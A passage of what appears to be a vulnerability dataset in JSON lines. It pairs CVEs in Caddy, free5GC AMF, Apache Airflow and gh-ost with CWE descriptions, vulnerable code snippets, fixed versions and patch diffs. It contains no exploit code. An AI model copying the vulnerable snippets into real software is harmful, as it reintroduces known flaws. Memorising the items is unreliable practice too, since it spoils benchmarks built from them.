contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/caddyserver/caddy", "patch_url": ["https://github.com/caddyserver/caddy/commit/78b5356f2b1945a90de1ef7f2c7669d82098edbd"], "programing_language": "Go", "vul_func": [{"id": "vul_go_220_1", "commit": "6f9b6ad", "file_path": "modules/caddyhttp/caddyhttp.go", "start_line": 17, "end_line": 30, "snippet": "import (\n\t\"bytes\"\n\t\"encoding/json\"\n\t\"io\"\n\t\"net\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"path/filepath\"\n\t\"strconv\"\n\t\"strings\"\n\n\t\"github.com/caddyserver/caddy/v2\"\n\t\"github.com/caddyserver/caddy/v2/caddyconfig/caddyfile\"\n)"}, {"id": "vul_go_220_2", "commit": "6f9b6ad", "file_path": "modules/caddyhttp/caddyhttp.go", "start_line": 230, "end_line": 247, "snippet": "func SanitizedPathJoin(root, reqPath string) string {\n\treqPath, _ = url.PathUnescape(reqPath)\n\tif root == \"\" {\n\t\troot = \".\"\n\t}\n\n\tpath := filepath.Join(root, filepath.Clean(\"/\"+reqPath))\n\n\t// filepath.Join also cleans the path, and cleaning strips\n\t// the trailing slash, so we need to re-add it afterwards.\n\t// if the length is 1, then it's a path to the root,\n\t// and that should return \".\", so we don't append the separator.\n\tif strings.HasSuffix(reqPath, \"/\") && len(reqPath) > 1 {\n\t\tpath += separator\n\t}\n\n\treturn path\n}"}, {"id": "vul_go_220_3", "commit": "6f9b6ad", "file_path": "modules/caddyhttp/fileserver/browsetplcontext.go", "start_line": 31, "end_line": 89, "snippet": "func (fsrv *FileServer) directoryListing(files []os.FileInfo, canGoUp bool, root, urlPath string, repl *caddy.Replacer) browseTemplateContext {\n\tfilesToHide := fsrv.transformHidePaths(repl)\n\n\tvar dirCount, fileCount int\n\tfileInfos := []fileInfo{}\n\n\tfor _, f := range files {\n\t\tname := f.Name()\n\n\t\tif fileHidden(name, filesToHide) {\n\t\t\tcontinue\n\t\t}\n\n\t\tisDir := f.IsDir() || isSymlinkTargetDir(f, root, urlPath)\n\n\t\tu := url.URL{Path: url.PathEscape(name)}\n\n\t\t// add the slash after the escape of path to avoid escaping the slash as well\n\t\tif isDir {\n\t\t\tu.Path += \"/\"\n\t\t\tdirCount++\n\t\t} else {\n\t\t\tfileCount++\n\t\t}\n\n\t\tsize := f.Size()\n\t\tfileIsSymlink := isSymlink(f)\n\t\tif fileIsSymlink {\n\t\t\tpath := caddyhttp.SanitizedPathJoin(root, path.Join(urlPath, f.Name()))\n\t\t\tfileInfo, err := os.Stat(path)\n\t\t\tif err == nil {\n\t\t\t\tsize = fileInfo.Size()\n\t\t\t}\n\t\t\t// An error most likely means the symlink target doesn't exist,\n\t\t\t// which isn't entirely unusual and shouldn't fail the listing.\n\t\t\t// In this case, just use the size of the symlink itself, which\n\t\t\t// was already set above.\n\t\t}\n\n\t\tfileInfos = append(fileInfos, fileInfo{\n\t\t\tIsDir: isDir,\n\t\t\tIsSymlink: fileIsSymlink,\n\t\t\tName: name,\n\t\t\tSize: size,\n\t\t\tURL: u.String(),\n\t\t\tModTime: f.ModTime().UTC(),\n\t\t\tMode: f.Mode(),\n\t\t})\n\t}\n\tname, _ := url.PathUnescape(urlPath)\n\treturn browseTemplateContext{\n\t\tName: path.Base(name),\n\t\tPath: urlPath,\n\t\tCanGoUp: canGoUp,\n\t\tItems: fileInfos,\n\t\tNumDirs: dirCount,\n\t\tNumFiles: fileCount,\n\t}\n}"}], "fix_func": [{"id": "fix_go_220_1", "commit": "78b5356f2b1945a90de1ef7f2c7669d82098edbd", "file_path": "modules/caddyhttp/caddyhttp.go", "start_line": 17, "end_line": 29, "snippet": "import (\n\t\"bytes\"\n\t\"encoding/json\"\n\t\"io\"\n\t\"net\"\n\t\"net/http\"\n\t\"path/filepath\"\n\t\"strconv\"\n\t\"strings\"\n\n\t\"github.com/caddyserver/caddy/v2\"\n\t\"github.com/caddyserver/caddy/v2/caddyconfig/caddyfile\"\n)"}, {"id": "fix_go_220_2", "commit": "78b5356f2b1945a90de1ef7f2c7669d82098edbd", "file_path": "modules/caddyhttp/caddyhttp.go", "start_line": 249, "end_line": 249, "snippet": "// It should only be used if another listener wrapper must be placed"}, {"id": "fix_go_220_3", "commit": "78b5356f2b1945a90de1ef7f2c7669d82098edbd", "file_path": "modules/caddyhttp/fileserver/browsetplcontext.go", "start_line": 31, "end_line": 89, "snippet": "func (fsrv *FileServer) directoryListing(files []os.FileInfo, canGoUp bool, root, urlPath string, repl *caddy.Replacer) browseTemplateContext {\n\tfilesToHide := fsrv.transformHidePaths(repl)\n\n\tvar dirCount, fileCount int\n\tfileInfos := []fileInfo{}\n\n\tfor _, f := range files {\n\t\tname := f.Name()\n\n\t\tif fileHidden(name, filesToHide) {\n\t\t\tcontinue\n\t\t}\n\n\t\tisDir := f.IsDir() || isSymlinkTargetDir(f, root, urlPath)\n\n\t\t// add the slash after the escape of path to avoid escaping the slash as well\n\t\tif isDir {\n\t\t\tname += \"/\"\n\t\t\tdirCount++\n\t\t} else {\n\t\t\tfileCount++\n\t\t}\n\n\t\tsize := f.Size()\n\t\tfileIsSymlink := isSymlink(f)\n\t\tif fileIsSymlink {\n\t\t\tpath := caddyhttp.SanitizedPathJoin(root, path.Join(urlPath, f.Name()))\n\t\t\tfileInfo, err := os.Stat(path)\n\t\t\tif err == nil {\n\t\t\t\tsize = fileInfo.Size()\n\t\t\t}\n\t\t\t// An error most likely means the symlink target doesn't exist,\n\t\t\t// which isn't entirely unusual and shouldn't fail the listing.\n\t\t\t// In this case, just use the size of the symlink itself, which\n\t\t\t// was already set above.\n\t\t}\n\n\t\tu := url.URL{Path: \"./\" + name} // prepend with \"./\" to fix paths with ':' in the name\n\n\t\tfileInfos = append(fileInfos, fileInfo{\n\t\t\tIsDir: isDir,\n\t\t\tIsSymlink: fileIsSymlink,\n\t\t\tName: name,\n\t\t\tSize: size,\n\t\t\tURL: u.String(),\n\t\t\tModTime: f.ModTime().UTC(),\n\t\t\tMode: f.Mode(),\n\t\t})\n\t}\n\tname, _ := url.PathUnescape(urlPath)\n\treturn browseTemplateContext{\n\t\tName: path.Base(name),\n\t\tPath: urlPath,\n\t\tCanGoUp: canGoUp,\n\t\tItems: fileInfos,\n\t\tNumDirs: dirCount,\n\t\tNumFiles: fileCount,\n\t}\n}"}], "vul_patch": "--- a/modules/caddyhttp/caddyhttp.go\n+++ b/modules/caddyhttp/caddyhttp.go\n@@ -4,7 +4,6 @@\n \t\"io\"\n \t\"net\"\n \t\"net/http\"\n-\t\"net/url\"\n \t\"path/filepath\"\n \t\"strconv\"\n \t\"strings\"\n\n--- a/modules/caddyhttp/caddyhttp.go\n+++ b/modules/caddyhttp/caddyhttp.go\n@@ -1,18 +1 @@\n-func SanitizedPathJoin(root, reqPath string) string {\n-\treqPath, _ = url.PathUnescape(reqPath)\n-\tif root == \"\" {\n-\t\troot = \".\"\n-\t}\n-\n-\tpath := filepath.Join(root, filepath.Clean(\"/\"+reqPath))\n-\n-\t// filepath.Join also cleans the path, and cleaning strips\n-\t// the trailing slash, so we need to re-add it afterwards.\n-\t// if the length is 1, then it's a path to the root,\n-\t// and that should return \".\", so we don't append the separator.\n-\tif strings.HasSuffix(reqPath, \"/\") && len(reqPath) > 1 {\n-\t\tpath += separator\n-\t}\n-\n-\treturn path\n-}\n+// It should only be used if another listener wrapper must be placed\n\n--- a/modules/caddyhttp/fileserver/browsetplcontext.go\n+++ b/modules/caddyhttp/fileserver/browsetplcontext.go\n@@ -13,11 +13,9 @@\n \n \t\tisDir := f.IsDir() || isSymlinkTargetDir(f, root, urlPath)\n \n-\t\tu := url.URL{Path: url.PathEscape(name)}\n-\n \t\t// add the slash after the escape of path to avoid escaping the slash as well\n \t\tif isDir {\n-\t\t\tu.Path += \"/\"\n+\t\t\tname += \"/\"\n \t\t\tdirCount++\n \t\t} else {\n \t\t\tfileCount++\n@@ -36,6 +34,8 @@\n \t\t\t// In this case, just use the size of the symlink itself, which\n \t\t\t// was already set above.\n \t\t}\n+\n+\t\tu := url.URL{Path: \"./\" + name} // prepend with \"./\" to fix paths with ':' in the name\n \n \t\tfileInfos = append(fileInfos, fileInfo{\n \t\t\tIsDir: isDir,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-49391", "cve_description": "An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/free5gc/amf", "patch_url": ["https://github.com/free5gc/amf/commit/6fc612c35997cf4e8be1e5c86ae2242f04b576a9"], "programing_language": "Go", "vul_func": [{"id": "vul_go_146_1", "commit": "aebc9fc", "file_path": "internal/context/context.go", "start_line": 353, "end_line": 360, "snippet": "func (context *AMFContext) NewAmfRan(conn net.Conn) *AmfRan {\n\tran := AmfRan{}\n\tran.SupportedTAList = make([]SupportedTAI, 0, MaxNumOfTAI*MaxNumOfBroadcastPLMNs)\n\tran.Conn = conn\n\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, conn.RemoteAddr().String())\n\tcontext.AmfRanPool.Store(conn, &ran)\n\treturn &ran\n}"}, {"id": "vul_go_146_2", "commit": "aebc9fc", "file_path": "internal/context/ran_ue.go", "start_line": 125, "end_line": 141, "snippet": "func (ranUe *RanUe) UpdateLogFields() {\n\tif ranUe.Ran != nil && ranUe.Ran.Conn != nil {\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, ranUe.Ran.Conn.RemoteAddr().String())\n\n\t\tanTypeStr := \"\"\n\t\tif ranUe.Ran.AnType == models.AccessType__3_GPP_ACCESS {\n\t\t\tanTypeStr = \"3GPP\"\n\t\t} else if ranUe.Ran.AnType == models.AccessType_NON_3_GPP_ACCESS {\n\t\t\tanTypeStr = \"Non3GPP\"\n\t\t}\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldAmfUeNgapID,\n\t\t\tfmt.Sprintf(\"RU:%d,AU:%d(%s)\", ranUe.RanUeNgapId, ranUe.AmfUeNgapId, anTypeStr))\n\t} else {\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, \"no ran conn\")\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldAmfUeNgapID, \"RU:,AU:\")\n\t}\n}"}, {"id": "vul_go_146_3", "commit": "aebc9fc", "file_path": "internal/ngap/dispatcher.go", "start_line": 13, "end_line": 46, "snippet": "func Dispatch(conn net.Conn, msg []byte) {\n\tvar ran *context.AmfRan\n\tamfSelf := context.GetSelf()\n\n\tran, ok := amfSelf.AmfRanFindByConn(conn)\n\tif !ok {\n\t\tlogger.NgapLog.Infof(\"Create a new NG connection for: %s\", conn.RemoteAddr().String())\n\t\tran = amfSelf.NewAmfRan(conn)\n\t}\n\n\tif len(msg) == 0 {\n\t\tran.Log.Infof(\"RAN close the connection.\")\n\t\tran.Remove()\n\t\treturn\n\t}\n\n\tpdu, err := ngap.Decoder(msg)\n\tif err != nil {\n\t\tran.Log.Errorf(\"NGAP decode error : %+v\", err)\n\t\treturn\n\t}\n\n\tif ran == nil {\n\t\tlogger.NgapLog.Error(\"ran is nil\")\n\t\treturn\n\t}\n\n\tif pdu == nil {\n\t\tran.Log.Error(\"NGAP Message is nil\")\n\t\treturn\n\t}\n\n\tdispatchMain(ran, pdu)\n}"}], "fix_func": [{"id": "fix_go_146_1", "commit": "6fc612c", "file_path": "internal/context/context.go", "start_line": 353, "end_line": 366, "snippet": "func (context *AMFContext) NewAmfRan(conn net.Conn) *AmfRan {\n\tran := AmfRan{}\n\tran.SupportedTAList = make([]SupportedTAI, 0, MaxNumOfTAI*MaxNumOfBroadcastPLMNs)\n\tran.Conn = conn\n\taddr := conn.RemoteAddr()\n\tif addr != nil {\n\t\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, addr.String())\n\t} else {\n\t\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, \"(nil)\")\n\t}\n\n\tcontext.AmfRanPool.Store(conn, &ran)\n\treturn &ran\n}"}, {"id": "fix_go_146_2", "commit": "6fc612c", "file_path": "internal/context/ran_ue.go", "start_line": 125, "end_line": 146, "snippet": "func (ranUe *RanUe) UpdateLogFields() {\n\tif ranUe.Ran != nil && ranUe.Ran.Conn != nil {\n\t\taddr := ranUe.Ran.Conn.RemoteAddr()\n\t\tif addr != nil {\n\t\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, addr.String())\n\t\t} else {\n\t\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, \"(nil)\")\n\t\t}\n\n\t\tanTypeStr := \"\"\n\t\tif ranUe.Ran.AnType == models.AccessType__3_GPP_ACCESS {\n\t\t\tanTypeStr = \"3GPP\"\n\t\t} else if ranUe.Ran.AnType == models.AccessType_NON_3_GPP_ACCESS {\n\t\t\tanTypeStr = \"Non3GPP\"\n\t\t}\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldAmfUeNgapID,\n\t\t\tfmt.Sprintf(\"RU:%d,AU:%d(%s)\", ranUe.RanUeNgapId, ranUe.AmfUeNgapId, anTypeStr))\n\t} else {\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, \"no ran conn\")\n\t\tranUe.Log = ranUe.Log.WithField(logger.FieldAmfUeNgapID, \"RU:,AU:\")\n\t}\n}"}, {"id": "fix_go_146_3", "commit": "6fc612c", "file_path": "internal/ngap/dispatcher.go", "start_line": 13, "end_line": 51, "snippet": "func Dispatch(conn net.Conn, msg []byte) {\n\tvar ran *context.AmfRan\n\tamfSelf := context.GetSelf()\n\n\tran, ok := amfSelf.AmfRanFindByConn(conn)\n\tif !ok {\n\t\taddr := conn.RemoteAddr()\n\t\tif addr == nil {\n\t\t\tlogger.NgapLog.Warn(\"Addr of new NG connection is nii\")\n\t\t\treturn\n\t\t}\n\t\tlogger.NgapLog.Infof(\"Create a new NG connection for: %s\", addr.String())\n\t\tran = amfSelf.NewAmfRan(conn)\n\t}\n\n\tif len(msg) == 0 {\n\t\tran.Log.Infof(\"RAN close the connection.\")\n\t\tran.Remove()\n\t\treturn\n\t}\n\n\tpdu, err := ngap.Decoder(msg)\n\tif err != nil {\n\t\tran.Log.Errorf(\"NGAP decode error : %+v\", err)\n\t\treturn\n\t}\n\n\tif ran == nil {\n\t\tlogger.NgapLog.Error(\"ran is nil\")\n\t\treturn\n\t}\n\n\tif pdu == nil {\n\t\tran.Log.Error(\"NGAP Message is nil\")\n\t\treturn\n\t}\n\n\tdispatchMain(ran, pdu)\n}"}], "vul_patch": "--- a/internal/context/context.go\n+++ b/internal/context/context.go\n@@ -2,7 +2,13 @@\n \tran := AmfRan{}\n \tran.SupportedTAList = make([]SupportedTAI, 0, MaxNumOfTAI*MaxNumOfBroadcastPLMNs)\n \tran.Conn = conn\n-\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, conn.RemoteAddr().String())\n+\taddr := conn.RemoteAddr()\n+\tif addr != nil {\n+\t\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, addr.String())\n+\t} else {\n+\t\tran.Log = logger.NgapLog.WithField(logger.FieldRanAddr, \"(nil)\")\n+\t}\n+\n \tcontext.AmfRanPool.Store(conn, &ran)\n \treturn &ran\n }\n\n--- a/internal/context/ran_ue.go\n+++ b/internal/context/ran_ue.go\n@@ -1,6 +1,11 @@\n func (ranUe *RanUe) UpdateLogFields() {\n \tif ranUe.Ran != nil && ranUe.Ran.Conn != nil {\n-\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, ranUe.Ran.Conn.RemoteAddr().String())\n+\t\taddr := ranUe.Ran.Conn.RemoteAddr()\n+\t\tif addr != nil {\n+\t\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, addr.String())\n+\t\t} else {\n+\t\t\tranUe.Log = ranUe.Log.WithField(logger.FieldRanAddr, \"(nil)\")\n+\t\t}\n \n \t\tanTypeStr := \"\"\n \t\tif ranUe.Ran.AnType == models.AccessType__3_GPP_ACCESS {\n\n--- a/internal/ngap/dispatcher.go\n+++ b/internal/ngap/dispatcher.go\n@@ -4,7 +4,12 @@\n \n \tran, ok := amfSelf.AmfRanFindByConn(conn)\n \tif !ok {\n-\t\tlogger.NgapLog.Infof(\"Create a new NG connection for: %s\", conn.RemoteAddr().String())\n+\t\taddr := conn.RemoteAddr()\n+\t\tif addr == nil {\n+\t\t\tlogger.NgapLog.Warn(\"Addr of new NG connection is nii\")\n+\t\t\treturn\n+\t\t}\n+\t\tlogger.NgapLog.Infof(\"Create a new NG connection for: %s\", addr.String())\n \t\tran = amfSelf.NewAmfRan(conn)\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-47037", "cve_description": "We failed to apply\u00a0CVE-2023-40611 in 2.7.1 and this vulnerability was marked as fixed then.\u00a0\n\nApache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc.\u00a0\n\nUsers should upgrade to version 2.7.3 or later which has removed the vulnerability.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/2a0106e4edf67c5905ebfcb82a6008662ae0f7ad", "https://github.com/apache/airflow/commit/b7a46c970d638028a4a7643ad000dcee951fb9ef"], "programing_language": "Python", "vul_func": [{"id": "vul_py_259_1", "commit": "a2b0a6a", "file_path": "airflow/www/forms.py", "start_line": 121, "end_line": 144, "snippet": "class DagRunEditForm(DynamicForm):\n \"\"\"Form for editing DAG Run.\n\n We don't actually want to allow editing, so everything is read-only here.\n \"\"\"\n\n dag_id = StringField(lazy_gettext(\"Dag Id\"), widget=BS3TextFieldROWidget())\n start_date = DateTimeWithTimezoneField(lazy_gettext(\"Start Date\"), widget=AirflowDateTimePickerROWidget())\n end_date = DateTimeWithTimezoneField(lazy_gettext(\"End Date\"), widget=AirflowDateTimePickerROWidget())\n run_id = StringField(lazy_gettext(\"Run Id\"), widget=BS3TextFieldROWidget())\n state = StringField(lazy_gettext(\"State\"), widget=BS3TextFieldROWidget())\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n widget=AirflowDateTimePickerROWidget(),\n )\n conf = TextAreaField(lazy_gettext(\"Conf\"), widget=BS3TextAreaROWidget())\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n\n def populate_obj(self, item):\n \"\"\"Populates the attributes of the passed obj with data from the form's fields.\"\"\"\n super().populate_obj(item)\n item.run_type = DagRunType.from_run_id(item.run_id)\n if item.conf:\n item.conf = json.loads(item.conf)"}, {"id": "vul_py_259_2", "commit": "a2b0a6a", "file_path": "airflow/www/forms.py", "start_line": 147, "end_line": 172, "snippet": "class TaskInstanceEditForm(DynamicForm):\n \"\"\"Form for editing TaskInstance.\"\"\"\n\n dag_id = StringField(lazy_gettext(\"Dag Id\"), validators=[InputRequired()], widget=BS3TextFieldROWidget())\n task_id = StringField(\n lazy_gettext(\"Task Id\"), validators=[InputRequired()], widget=BS3TextFieldROWidget()\n )\n start_date = DateTimeWithTimezoneField(lazy_gettext(\"Start Date\"), widget=AirflowDateTimePickerROWidget())\n end_date = DateTimeWithTimezoneField(lazy_gettext(\"End Date\"), widget=AirflowDateTimePickerROWidget())\n state = SelectField(\n lazy_gettext(\"State\"),\n choices=(\n (\"success\", \"success\"),\n (\"running\", \"running\"),\n (\"failed\", \"failed\"),\n (\"up_for_retry\", \"up_for_retry\"),\n ),\n widget=Select2Widget(),\n validators=[InputRequired()],\n )\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n widget=AirflowDateTimePickerROWidget(),\n validators=[InputRequired()],\n )\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())"}], "fix_func": [{"id": "fix_py_259_1", "commit": "2a0106e", "file_path": "airflow/www/forms.py", "start_line": 121, "end_line": 151, "snippet": "class DagRunEditForm(DynamicForm):\n \"\"\"Form for editing DAG Run.\n\n Only note field is editable, so everything else is read-only here.\n \"\"\"\n\n dag_id = StringField(lazy_gettext(\"Dag Id\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n start_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Start Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n )\n end_date = DateTimeWithTimezoneField(\n lazy_gettext(\"End Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n )\n run_id = StringField(lazy_gettext(\"Run Id\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n state = StringField(lazy_gettext(\"State\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n validators=[ReadOnly()],\n widget=AirflowDateTimePickerROWidget(),\n )\n conf = TextAreaField(lazy_gettext(\"Conf\"), validators=[ReadOnly()], widget=BS3TextAreaROWidget())\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n\n def populate_obj(self, item):\n \"\"\"Populates the attributes of the passed obj with data from the form's not-read-only fields.\"\"\"\n for name, field in self._fields.items():\n if not field.flags.readonly:\n field.populate_obj(item, name)\n item.run_type = DagRunType.from_run_id(item.run_id)\n if item.conf:\n item.conf = json.loads(item.conf)"}, {"id": "fix_py_259_2", "commit": "2a0106e", "file_path": "airflow/www/forms.py", "start_line": 154, "end_line": 194, "snippet": "class TaskInstanceEditForm(DynamicForm):\n \"\"\"Form for editing TaskInstance.\n\n Only note and state fields are editable, so everything else is read-only here.\n \"\"\"\n\n dag_id = StringField(\n lazy_gettext(\"Dag Id\"), validators=[InputRequired(), ReadOnly()], widget=BS3TextFieldROWidget()\n )\n task_id = StringField(\n lazy_gettext(\"Task Id\"), validators=[InputRequired(), ReadOnly()], widget=BS3TextFieldROWidget()\n )\n start_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Start Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n )\n end_date = DateTimeWithTimezoneField(\n lazy_gettext(\"End Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n )\n state = SelectField(\n lazy_gettext(\"State\"),\n choices=(\n (\"success\", \"success\"),\n (\"running\", \"running\"),\n (\"failed\", \"failed\"),\n (\"up_for_retry\", \"up_for_retry\"),\n ),\n widget=Select2Widget(),\n validators=[InputRequired()],\n )\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n widget=AirflowDateTimePickerROWidget(),\n validators=[InputRequired(), ReadOnly()],\n )\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n\n def populate_obj(self, item):\n \"\"\"Populates the attributes of the passed obj with data from the form's not-read-only fields.\"\"\"\n for name, field in self._fields.items():\n if not field.flags.readonly:\n field.populate_obj(item, name)"}, {"id": "fix_py_259_3", "commit": "2a0106e", "file_path": "airflow/www/validators.py", "start_line": 102, "end_line": 110, "snippet": "class ReadOnly:\n \"\"\"Adds readonly flag to a field.\n\n When using this you normally will need to override the form's populate_obj method,\n so field.populate_obj is not called for read-only fields.\n \"\"\"\n\n def __call__(self, form, field):\n field.flags.readonly = True"}], "vul_patch": "--- a/airflow/www/forms.py\n+++ b/airflow/www/forms.py\n@@ -1,24 +1,31 @@\n class DagRunEditForm(DynamicForm):\n \"\"\"Form for editing DAG Run.\n \n- We don't actually want to allow editing, so everything is read-only here.\n+ Only note field is editable, so everything else is read-only here.\n \"\"\"\n \n- dag_id = StringField(lazy_gettext(\"Dag Id\"), widget=BS3TextFieldROWidget())\n- start_date = DateTimeWithTimezoneField(lazy_gettext(\"Start Date\"), widget=AirflowDateTimePickerROWidget())\n- end_date = DateTimeWithTimezoneField(lazy_gettext(\"End Date\"), widget=AirflowDateTimePickerROWidget())\n- run_id = StringField(lazy_gettext(\"Run Id\"), widget=BS3TextFieldROWidget())\n- state = StringField(lazy_gettext(\"State\"), widget=BS3TextFieldROWidget())\n+ dag_id = StringField(lazy_gettext(\"Dag Id\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n+ start_date = DateTimeWithTimezoneField(\n+ lazy_gettext(\"Start Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n+ )\n+ end_date = DateTimeWithTimezoneField(\n+ lazy_gettext(\"End Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n+ )\n+ run_id = StringField(lazy_gettext(\"Run Id\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n+ state = StringField(lazy_gettext(\"State\"), validators=[ReadOnly()], widget=BS3TextFieldROWidget())\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n+ validators=[ReadOnly()],\n widget=AirflowDateTimePickerROWidget(),\n )\n- conf = TextAreaField(lazy_gettext(\"Conf\"), widget=BS3TextAreaROWidget())\n+ conf = TextAreaField(lazy_gettext(\"Conf\"), validators=[ReadOnly()], widget=BS3TextAreaROWidget())\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n \n def populate_obj(self, item):\n- \"\"\"Populates the attributes of the passed obj with data from the form's fields.\"\"\"\n- super().populate_obj(item)\n+ \"\"\"Populates the attributes of the passed obj with data from the form's not-read-only fields.\"\"\"\n+ for name, field in self._fields.items():\n+ if not field.flags.readonly:\n+ field.populate_obj(item, name)\n item.run_type = DagRunType.from_run_id(item.run_id)\n if item.conf:\n item.conf = json.loads(item.conf)\n\n--- a/airflow/www/forms.py\n+++ b/airflow/www/forms.py\n@@ -1,12 +1,21 @@\n class TaskInstanceEditForm(DynamicForm):\n- \"\"\"Form for editing TaskInstance.\"\"\"\n+ \"\"\"Form for editing TaskInstance.\n \n- dag_id = StringField(lazy_gettext(\"Dag Id\"), validators=[InputRequired()], widget=BS3TextFieldROWidget())\n+ Only note and state fields are editable, so everything else is read-only here.\n+ \"\"\"\n+\n+ dag_id = StringField(\n+ lazy_gettext(\"Dag Id\"), validators=[InputRequired(), ReadOnly()], widget=BS3TextFieldROWidget()\n+ )\n task_id = StringField(\n- lazy_gettext(\"Task Id\"), validators=[InputRequired()], widget=BS3TextFieldROWidget()\n+ lazy_gettext(\"Task Id\"), validators=[InputRequired(), ReadOnly()], widget=BS3TextFieldROWidget()\n )\n- start_date = DateTimeWithTimezoneField(lazy_gettext(\"Start Date\"), widget=AirflowDateTimePickerROWidget())\n- end_date = DateTimeWithTimezoneField(lazy_gettext(\"End Date\"), widget=AirflowDateTimePickerROWidget())\n+ start_date = DateTimeWithTimezoneField(\n+ lazy_gettext(\"Start Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n+ )\n+ end_date = DateTimeWithTimezoneField(\n+ lazy_gettext(\"End Date\"), validators=[ReadOnly()], widget=AirflowDateTimePickerROWidget()\n+ )\n state = SelectField(\n lazy_gettext(\"State\"),\n choices=(\n@@ -21,6 +30,12 @@\n execution_date = DateTimeWithTimezoneField(\n lazy_gettext(\"Logical Date\"),\n widget=AirflowDateTimePickerROWidget(),\n- validators=[InputRequired()],\n+ validators=[InputRequired(), ReadOnly()],\n )\n note = TextAreaField(lazy_gettext(\"User Note\"), widget=BS3TextAreaFieldWidget())\n+\n+ def populate_obj(self, item):\n+ \"\"\"Populates the attributes of the passed obj with data from the form's not-read-only fields.\"\"\"\n+ for name, field in self._fields.items():\n+ if not field.flags.readonly:\n+ field.populate_obj(item, name)\n\n--- /dev/null\n+++ b/airflow/www/forms.py\n@@ -0,0 +1,9 @@\n+class ReadOnly:\n+ \"\"\"Adds readonly flag to a field.\n+\n+ When using this you normally will need to override the form's populate_obj method,\n+ so field.populate_obj is not called for read-only fields.\n+ \"\"\"\n+\n+ def __call__(self, form, field):\n+ field.flags.readonly = True\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21687", "cve_description": "gh-ost is a triggerless online schema migration solution for MySQL. Versions prior to 1.1.3 are subject to an arbitrary file read vulnerability. The attacker must have access to the target host or trick an administrator into executing a malicious gh-ost command on a host running gh-ost, plus network access from host running gh-ost to the attack's malicious MySQL server. The `-database` parameter does not properly sanitize user input which can lead to arbitrary file reads.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are 